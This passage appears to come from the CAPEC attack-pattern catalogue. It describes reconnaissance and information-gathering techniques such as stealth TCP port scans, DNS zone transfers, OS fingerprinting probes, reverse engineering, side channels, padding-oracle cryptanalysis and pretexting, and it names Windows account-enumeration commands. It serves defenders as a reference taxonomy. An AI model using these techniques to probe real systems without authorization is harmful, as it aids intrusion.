An adversary uses a TCP FIN scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with the FIN bit set in the packet header. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow the adversary to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 300 (Port Scanning) > 303 (TCP Xmas Scan)

An adversary uses a TCP XMAS scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with all possible flags set in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 300 (Port Scanning) > 304 (TCP Null Scan)

An adversary uses a TCP NULL scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with no flags in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 300 (Port Scanning) > 305 (TCP ACK Scan)

An adversary uses TCP ACK segments to gather information about firewall or ACL configuration. The purpose of this type of scan is to discover information about filter configurations rather than port state. This type of scanning is rarely useful alone, but when combined with SYN scanning, gives a more complete picture of the type of firewall rules that are present.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 300 (Port Scanning) > 306 (TCP Window Scan)

An adversary engages in TCP Window scanning to analyze port status and operating system type. TCP Window scanning uses the ACK scanning method but examine the TCP Window Size field of response RST packets to make certain inferences. While TCP Window Scans are fast and relatively stealthy, they work against fewer TCP stack implementations than any other type of scan. Some operating systems return a positive TCP window size when a RST packet is sent from an open port, and a negative value when the RST originates from a closed port. TCP Window scanning is one of the most complex scan types, and its results are difficult to interpret. Window scanning alone rarely yields useful information, but when combined with other types of scanning is more useful. It is a generally more reliable means of making inference about operating system versions than port status.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 300 (Port Scanning) > 307 (TCP RPC Scan)

An adversary scans for RPC services listing on a Unix/Linux host.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 300 (Port Scanning) > 308 (UDP Scan)

An adversary engages in UDP scanning to gather information about UDP port status on the target system. UDP scanning methods involve sending a UDP datagram to the target port and looking for evidence that the port is closed. Open UDP ports usually do not respond to UDP datagrams as there is no stateful mechanism within the protocol that requires building or establishing a session. Responses to UDP datagrams are therefore application specific and cannot be relied upon as a method of detecting an open port. UDP scanning relies heavily upon ICMP diagnostic messages in order to determine the status of a remote port.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 309 (Network Topology Mapping)

An adversary engages in scanning activities to map network nodes, hosts, devices, and routes. Adversaries usually perform this type of network reconnaissance during the early stages of attack against an external network. Many types of scanning utilities are typically employed, including ICMP tools, network mappers, port scanners, and route testing utilities such as traceroute.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 309 (Network Topology Mapping) > 290 (Enumerate Mail Exchange (MX) Records)

An adversary enumerates the MX records for a given via a DNS query. This type of information gathering returns the names of mail servers on the network. Mail servers are often not exposed to the Internet but are located within the DMZ of a network protected by a firewall. A side effect of this configuration is that enumerating the MX records for an organization my reveal the IP address of the firewall or possibly other internal systems. Attackers often resort to MX record enumeration when a DNS Zone Transfer is not possible.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 309 (Network Topology Mapping) > 291 (DNS Zone Transfers)

An attacker exploits a DNS misconfiguration that permits a ZONE transfer. Some external DNS servers will return a list of IP address and valid hostnames. Under certain conditions, it may even be possible to obtain Zone data about the organization's internal network. When successful the attacker learns valuable information about the topology of the target organization, including information about particular servers, their role within the IT structure, and possibly information about the operating systems running upon the network. This is configuration dependent behavior so it may also be required to search out multiple DNS servers while attempting to find one with ZONE transfers allowed.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 309 (Network Topology Mapping) > 293 (Traceroute Route Enumeration)

An adversary uses a traceroute utility to map out the route which data flows through the network in route to a target destination. Tracerouting can allow the adversary to construct a working topology of systems and routers by listing the systems through which data passes through on their way to the targeted machine. This attack can return varied results depending upon the type of traceroute that is performed. Traceroute works by sending packets to a target while incrementing the Time-to-Live field in the packet header. As the packet traverses each hop along its way to the destination, its TTL expires generating an ICMP diagnostic message that identifies where the packet expired. Traditional techniques for tracerouting involved the use of ICMP and UDP, but as more firewalls began to filter ingress ICMP, methods of traceroute using TCP were developed.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 309 (Network Topology Mapping) > 643 (Identify Shared Files/Directories on System)

An adversary discovers connections between systems by exploiting the target system's standard practice of revealing them in searchable, common areas. Through the identification of shared folders/drives between systems, the adversary may further their goals of locating and collecting sensitive information/files, or map potential routes for lateral movement within the network.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 497 (File Discovery)

An adversary engages in probing and exploration activities to determine if common key files exists. Such files often contain configuration and security parameters of the targeted application, system or network. Using this knowledge may often pave the way for more damaging attacks.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 497 (File Discovery) > 149 (Explore for Predictable Temporary File Names)

An attacker explores a target to identify the names and locations of predictable temporary files for the purpose of launching further attacks against the target. This involves analyzing naming conventions and storage locations of the temporary files created by a target application. If an attacker can predict the names of temporary files they can use this information to mount other attacks, such as information gathering and symlink attacks.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 529 (Malware-Directed Internal Reconnaissance)

Adversary uses malware or a similarly controlled application installed inside an organizational perimeter to gather information about the composition, configuration, and security mechanisms of a targeted application, system or network.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 573 (Process Footprinting)

An adversary exploits functionality meant to identify information about the currently running processes on the target system to an authorized user. By knowing what processes are running on the target system, the adversary can learn about the target environment as a means towards further malicious behavior.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 574 (Services Footprinting)

An adversary exploits functionality meant to identify information about the services on the target system to an authorized user. By knowing what services are registered on the target system, the adversary can learn about the target environment as a means towards further malicious behavior. Depending on the operating system, commands that can obtain services information include "sc" and "tasklist/svc" using Tasklist, and "net start" using Net.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 575 (Account Footprinting)

An adversary exploits functionality meant to identify information about the domain accounts and their permissions on the target system to an authorized user. By knowing what accounts are registered on the target system, the adversary can inform further and more targeted malicious behavior. Example Windows commands which can acquire this information are: "net user" and "dsquery".

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 576 (Group Permission Footprinting)

An adversary exploits functionality meant to identify information about user groups and their permissions on the target system to an authorized user. By knowing what users/permissions are registered on the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command which can list local groups is "net localgroup".

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 577 (Owner Footprinting)

An adversary exploits functionality meant to identify information about the primary users on the target system to an authorized user. They may do this, for example, by reviewing logins or file modification times. By knowing what owners use the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command that may accomplish this is "dir /A ntuser.dat". Which will display the last modified time of a user's ntuser.dat file when run within the root folder of a user. This time is synonymous with the last time that user was logged in.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 580 (System Footprinting)

An adversary engages in active probing and exploration activities to determine security information about a remote target system. Often times adversaries will rely on remote applications that can be probed for system configurations.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 580 (System Footprinting) > 581 (Security Software Footprinting)

Adversaries may attempt to get a listing of security tools that are installed on the system and their configurations. This may include security related system features (such as a built-in firewall or anti-spyware) as well as third-party security software.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 580 (System Footprinting) > 85 (AJAX Footprinting)

This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 646 (Peripheral Footprinting)

Adversaries may attempt to obtain information about attached peripheral devices and components connected to a computer system. Examples may include discovering the presence of iOS devices by searching for backups, analyzing the Windows registry to determine what USB devices have been connected, or infecting a victim system with malware to report when a USB device has been connected. This may allow the adversary to gain additional insight about the system or network environment, which may be useful in constructing further attacks.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 694 (System Location Discovery)

An adversary collects information about the target system in an attempt to identify the system's geographical location. Information gathered could include keyboard layout, system language, and timezone. This information may benefit an adversary in confirming the desired target and/or tailoring further attacks.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting)

An adversary compares output from a target system to known indicators that uniquely identify specific details about the target. Most commonly, fingerprinting is done to determine operating system and application versions. Fingerprinting can be done passively as well as actively. Fingerprinting by itself is not usually detrimental to the target. However, the information gathered through fingerprinting often enables an adversary to discover existing weaknesses in the target.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting)

An adversary engages in activity to detect the operating system or firmware version of a remote target by interrogating a device, server, or platform with a probe designed to solicit behavior that will reveal information about the operating systems or firmware in the environment. Operating System detection is possible because implementations of common protocols (Such as IP or TCP) differ in distinct ways. While the implementation differences are not sufficient to 'break' compatibility with the protocol the differences are detectable because the target will respond in unique ways to specific probing activity that breaks the semantic or logical rules of packet construction for a protocol. Different operating systems will have a unique response to the anomalous input, providing the basis to fingerprint the OS behavior. This type of OS fingerprinting can distinguish between operating system types and versions.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 317 (IP ID Sequencing Probe)

This OS fingerprinting probe analyzes the IP 'ID' field sequence number generation algorithm of a remote host. Operating systems generate IP 'ID' numbers differently, allowing an attacker to identify the operating system of the host by examining how is assigns ID numbers when generating response packets. RFC 791 does not specify how ID numbers are chosen or their ranges, so ID sequence generation differs from implementation to implementation. There are two kinds of IP 'ID' sequence number analysis - IP 'ID' Sequencing: analyzing the IP 'ID' sequence generation algorithm for one protocol used by a host and Shared IP 'ID' Sequencing: analyzing the packet ordering via IP 'ID' values spanning multiple protocols, such as between ICMP and TCP.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 318 (IP 'ID' Echoed Byte-Order Probe)

This OS fingerprinting probe tests to determine if the remote host echoes back the IP 'ID' value from the probe packet. An attacker sends a UDP datagram with an arbitrary IP 'ID' value to a closed port on the remote host to observe the manner in which this bit is echoed back in the ICMP error message. The identification field (ID) is typically utilized for reassembling a fragmented packet. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within an ICMP error message.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 319 (IP (DF) 'Don't Fragment Bit' Echoing Probe)

This OS fingerprinting probe tests to determine if the remote host echoes back the IP 'DF' (Don't Fragment) bit in a response packet. An attacker sends a UDP datagram with the DF bit set to a closed port on the remote host to observe whether the 'DF' bit is set in the response packet. Some operating systems will echo the bit in the ICMP error message while others will zero out the bit in the response packet.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 320 (TCP Timestamp Probe)

This OS fingerprinting probe examines the remote server's implementation of TCP timestamps. Not all operating systems implement timestamps within the TCP header, but when timestamps are used then this provides the attacker with a means to guess the operating system of the target. The attacker begins by probing any active TCP service in order to get response which contains a TCP timestamp. Different Operating systems update the timestamp value using different intervals. This type of analysis is most accurate when multiple timestamp responses are received and then analyzed. TCP timestamps can be found in the TCP Options field of the TCP header.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 321 (TCP Sequence Number Probe)

This OS fingerprinting probe tests the target system's assignment of TCP sequence numbers. One common way to test TCP Sequence Number generation is to send a probe packet to an open port on the target and then compare the how the Sequence Number generated by the target relates to the Acknowledgement Number in the probe packet. Different operating systems assign Sequence Numbers differently, so a fingerprint of the operating system can be obtained by categorizing the relationship between the acknowledgement number and sequence number as follows: 1) the Sequence Number generated by the target is Zero, 2) the Sequence Number generated by the target is the same as the acknowledgement number in the probe, 3) the Sequence Number generated by the target is the acknowledgement number plus one, or 4) the Sequence Number is any other non-zero number.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 322 (TCP (ISN) Greatest Common Divisor Probe)

This OS fingerprinting probe sends a number of TCP SYN packets to an open port of a remote machine. The Initial Sequence Number (ISN) in each of the SYN/ACK response packets is analyzed to determine the smallest number that the target host uses when incrementing sequence numbers. This information can be useful for identifying an operating system because particular operating systems and versions increment sequence numbers using different values. The result of the analysis is then compared against a database of OS behaviors to determine the OS type and/or version.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 323 (TCP (ISN) Counter Rate Probe)

This OS detection probe measures the average rate of initial sequence number increments during a period of time. Sequence numbers are incremented using a time-based algorithm and are susceptible to a timing analysis that can determine the number of increments per unit time. The result of this analysis is then compared against a database of operating systems and versions to determine likely operation system matches.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 324 (TCP (ISN) Sequence Predictability Probe)

This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 325 (TCP Congestion Control Flag (ECN) Probe)

This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 326 (TCP Initial Window Size Probe)

This OS fingerprinting probe checks the initial TCP Window size. TCP stacks limit the range of sequence numbers allowable within a session to maintain the "connected" state within TCP protocol logic. The initial window size specifies a range of acceptable sequence numbers that will qualify as a response to an ACK packet within a session. Various operating systems use different Initial window sizes. The initial window size can be sampled by establishing an ordinary TCP connection.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 327 (TCP Options Probe)

This OS fingerprinting probe analyzes the type and order of any TCP header options present within a response segment. Most operating systems use unique ordering and different option sets when options are present. RFC 793 does not specify a required order when options are present, so different implementations use unique ways of ordering or structuring TCP options. TCP options can be generated by ordinary TCP traffic.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 328 (TCP 'RST' Flag Checksum Probe)

This OS fingerprinting probe performs a checksum on any ASCII data contained within the data portion or a RST packet. Some operating systems will report a human-readable text message in the payload of a 'RST' (reset) packet when specific types of connection errors occur. RFC 1122 allows text payloads within reset packets but not all operating systems or routers implement this functionality.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 329 (ICMP Error Message Quoting Probe)

An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the amount of data returned or "Quoted" from the originating request that generated the ICMP error message.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 330 (ICMP Error Message Echoing Integrity Probe)

An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the integrity of data returned or "Quoted" from the originating request that generated the error message.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 331 (ICMP IP Total Length Field Probe)

An adversary sends a UDP packet to a closed port on the target machine to solicit an IP Header's total length field value within the echoed 'Port Unreachable" error message. This type of behavior is useful for building a signature-base of operating system responses, particularly when error messages contain other types of information that is useful identifying specific operating system responses.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 312 (Active OS Fingerprinting) > 332 (ICMP IP 'ID' Field Error Message Probe)

An adversary sends a UDP datagram having an assigned value to its internet identification field (ID) to a closed port on a target to observe the manner in which this bit is echoed back in the ICMP error message. This allows the attacker to construct a fingerprint of specific OS behaviors.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 313 (Passive OS Fingerprinting)

An adversary engages in activity to detect the version or type of OS software in a an environment by passively monitoring communication between devices, nodes, or applications. Passive techniques for operating system detection send no actual probes to a target, but monitor network or client-server communication between nodes in order to identify operating systems based on observed behavior as compared to a database of known signatures or values. While passive OS fingerprinting is not usually as reliable as active methods, it is generally better able to evade detection.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 541 (Application Fingerprinting)

An adversary engages in fingerprinting activities to determine the type or version of an application installed on a remote target.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 541 (Application Fingerprinting) > 170 (Web Application Fingerprinting)

An attacker sends a series of probes to a web application in order to elicit version-dependent and type-dependent behavior that assists in identifying the target. An attacker could learn information such as software versions, error pages, and response headers, variations in implementations of the HTTP protocol, directory structures, and other similar information about the targeted service. This information can then be used by an attacker to formulate a targeted attack plan. While web application fingerprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 541 (Application Fingerprinting) > 310 (Scanning for Vulnerable Software)

An attacker engages in scanning activity to find vulnerable software versions or types, such as operating system versions or network services. Vulnerable or exploitable network configurations, such as improperly firewalled systems, or misconfigured systems in the DMZ or external network, provide windows of opportunity for an attacker. Common types of vulnerable software include unpatched operating systems or services (e.g FTP, Telnet, SMTP, SNMP) running on open ports that the attacker has identified. Attackers usually begin probing for vulnerable software once the external network has been port scanned and potential targets have been revealed.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 224 (Fingerprinting) > 541 (Application Fingerprinting) > 472 (Browser Fingerprinting)

An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 188 (Reverse Engineering)

An adversary discovers the structure, function, and composition of an object, resource, or system by using a variety of analysis techniques to effectively determine how the analyzed entity was constructed or operates. The goal of reverse engineering is often to duplicate the function, or a part of the function, of an object in order to duplicate or "back engineer" some aspect of its functioning. Reverse engineering techniques can be applied to mechanical objects, electronic devices, or software, although the methodology and techniques involved in each type of analysis differ widely.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 188 (Reverse Engineering) > 167 (White Box Reverse Engineering)

An attacker discovers the structure, function, and composition of a type of computer software through white box analysis techniques. White box techniques involve methods which can be applied to a piece of software when an executable or some other compiled object can be directly subjected to analysis, revealing at least a portion of its machine instructions that can be observed upon execution.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 188 (Reverse Engineering) > 167 (White Box Reverse Engineering) > 190 (Reverse Engineer an Executable to Expose Assumed Hidden Functionality)

An attacker analyzes a binary file or executable for the purpose of discovering the structure, function, and possibly source-code of the file by using a variety of analysis techniques to effectively determine how the software functions and operates. This type of analysis is also referred to as Reverse Code Engineering, as techniques exist for extracting source code from an executable. Several techniques are often employed for this purpose, both black box and white box. The use of computer bus analyzers and packet sniffers allows the binary to be studied at a level of interactions with its computing environment, such as a host OS, inter-process communication, and/or network communication. This type of analysis falls into the 'black box' category because it involves behavioral analysis of the software without reference to source code, object code, or protocol specifications.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 188 (Reverse Engineering) > 167 (White Box Reverse Engineering) > 191 (Read Sensitive Constants Within an Executable)

An adversary engages in activities to discover any sensitive constants present within the compiled code of an executable. These constants may include literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 188 (Reverse Engineering) > 167 (White Box Reverse Engineering) > 204 (Lifting Sensitive Data Embedded in Cache)

An adversary examines a target application's cache, or a browser cache, for sensitive information. Many applications that communicate with remote entities or which perform intensive calculations utilize caches to improve efficiency. However, if the application computes or receives sensitive information and the cache is not appropriately protected, an attacker can browse the cache and retrieve this information. This can result in the disclosure of sensitive information.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 188 (Reverse Engineering) > 167 (White Box Reverse Engineering) > 37 (Retrieve Embedded Sensitive Data)

An attacker examines a target system to find sensitive data that has been embedded within it. This information can reveal confidential contents, such as account numbers or individual keys/credentials that can be used as an intermediate step in a larger attack.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 188 (Reverse Engineering) > 189 (Black Box Reverse Engineering)

An adversary discovers the structure, function, and composition of a type of computer software through black box analysis techniques. 'Black Box' methods involve interacting with the software indirectly, in the absence of direct access to the executable object. Such analysis typically involves interacting with the software at the boundaries of where the software interfaces with a larger execution environment, such as input-output vectors, libraries, or APIs. Black Box Reverse Engineering also refers to gathering physical side effects of a hardware device, such as electromagnetic radiation or sounds.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 188 (Reverse Engineering) > 189 (Black Box Reverse Engineering) > 621 (Analysis of Packet Timing and Sizes)

An attacker may intercept and log encrypted transmissions for the purpose of analyzing metadata such as packet timing and sizes. Although the actual data may be encrypted, this metadata may reveal valuable information to an attacker. Note that this attack is applicable to VOIP data as well as application data, especially for interactive apps that require precise timing and low-latency (e.g. thin-clients).

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 188 (Reverse Engineering) > 189 (Black Box Reverse Engineering) > 622 (Electromagnetic Side-Channel Attack)

In this attack scenario, the attacker passively monitors electromagnetic emanations that are produced by the targeted electronic device as an unintentional side-effect of its processing. From these emanations, the attacker derives information about the data that is being processed (e.g. the attacker can recover cryptographic keys by monitoring emanations associated with cryptographic processing). This style of attack requires proximal access to the device, however attacks have been demonstrated at public conferences that work at distances of up to 10-15 feet. There have not been any significant studies to determine the maximum practical distance for such attacks. Since the attack is passive, it is nearly impossible to detect and the targeted device will continue to operate as normal after a successful attack.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 188 (Reverse Engineering) > 189 (Black Box Reverse Engineering) > 623 (Compromising Emanations Attack)

Compromising Emanations (CE) are defined as unintentional signals which an attacker may intercept and analyze to disclose the information processed by the targeted equipment. Commercial mobile devices and retransmission devices have displays, buttons, microchips, and radios that emit mechanical emissions in the form of sound or vibrations. Capturing these emissions can help an adversary understand what the device is doing.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 192 (Protocol Analysis)

An adversary engages in activities to decipher and/or decode protocol information for a network or application communication protocol used for transmitting information between interconnected nodes or systems on a packet-switched data network. While this type of analysis involves the analysis of a networking protocol inherently, it does not require the presence of an actual or physical network.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 192 (Protocol Analysis) > 97 (Cryptanalysis)

Cryptanalysis is a process of finding weaknesses in cryptographic algorithms and using these weaknesses to decipher the ciphertext without knowing the secret key (instance deduction). Sometimes the weakness is not in the cryptographic algorithm itself, but rather in how it is applied that makes cryptanalysis successful. An attacker may have other goals as well, such as: Total Break (finding the secret key), Global Deduction (finding a functionally equivalent algorithm for encryption and decryption that does not require knowledge of the secret key), Information Deduction (gaining some information about plaintexts or ciphertexts that was not previously known) and Distinguishing Algorithm (the attacker has the ability to distinguish the output of the encryption (ciphertext) from a random permutation of bits).

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 192 (Protocol Analysis) > 97 (Cryptanalysis) > 463 (Padding Oracle Crypto Attack)

An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 192 (Protocol Analysis) > 97 (Cryptanalysis) > 608 (Cryptanalysis of Cellular Encryption)

The use of cryptanalytic techniques to derive cryptographic keys or otherwise effectively defeat cellular encryption to reveal traffic content. Some cellular encryption algorithms such as A5/1 and A5/2 (specified for GSM use) are known to be vulnerable to such attacks and commercial tools are available to execute these attacks and decrypt mobile phone conversations in real-time. Newer encryption algorithms in use by UMTS and LTE are stronger and currently believed to be less vulnerable to these types of attacks. Note, however, that an attacker with a Cellular Rogue Base Station can force the use of weak cellular encryption even by newer mobile devices.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 410 (Information Elicitation)

An adversary engages an individual using any combination of social engineering methods for the purpose of extracting information. Accurate contextual and environmental queues, such as knowing important information about the target company or individual can greatly increase the success of the attack and the quality of information gathered. Authentic mimicry combined with detailed knowledge increases the success of elicitation attacks.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 410 (Information Elicitation) > 407 (Pretexting)

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 410 (Information Elicitation) > 407 (Pretexting) > 383 (Harvesting Information via API Event Monitoring)

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 410 (Information Elicitation) > 407 (Pretexting) > 412 (Pretexting via Customer Service)

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 410 (Information Elicitation) > 407 (Pretexting) > 413 (Pretexting via Tech Support)

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 410 (Information Elicitation) > 407 (Pretexting) > 414 (Pretexting via Delivery Person)

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 410 (Information Elicitation) > 407 (Pretexting) > 415 (Pretexting via Phone)

1000 (Mechanisms of Attack) > 225 (Subvert Access Control)

An attacker actively targets exploitation of weaknesses, limitations and assumptions in the mechanisms a target utilizes to manage identity and authentication as well as manage access to its resources or authorize functionality. Such exploitation can lead to the complete subversion of any trust the target system may have in the identity of any entity with which it interacts, or the complete subversion of any control the target has over its data or functionality. Weaknesses targeted by subversion of authorization controls are often due to three primary factors: 1) a fundamental dependence on authentication mechanisms being effective; 2) a lack of effective control over the separation of privilege between various entities; and 3) assumptions and over confidence in the strength or rigor of the implemented authorization mechanisms.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 21 (Exploitation of Trusted Identifiers)

An adversary guesses, obtains, or "rides" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 21 (Exploitation of Trusted Identifiers) > 196 (Session Credential Falsification through Forging)

An attacker creates a false but functional session credential in order to gain or usurp access to a service. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. If an attacker is able to forge valid session credentials they may be able to bypass authentication or piggy-back off some other authenticated user's session. This attack differs from Reuse of Session IDs and Session Sidejacking attacks in that in the latter attacks an attacker uses a previous or existing credential without modification while, in a forging attack, the attacker must create their own credential, although it may be based on previously observed credentials.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 21 (Exploitation of Trusted Identifiers) > 196 (Session Credential Falsification through Forging) > 226 (Session Credential Falsification through Manipulation)

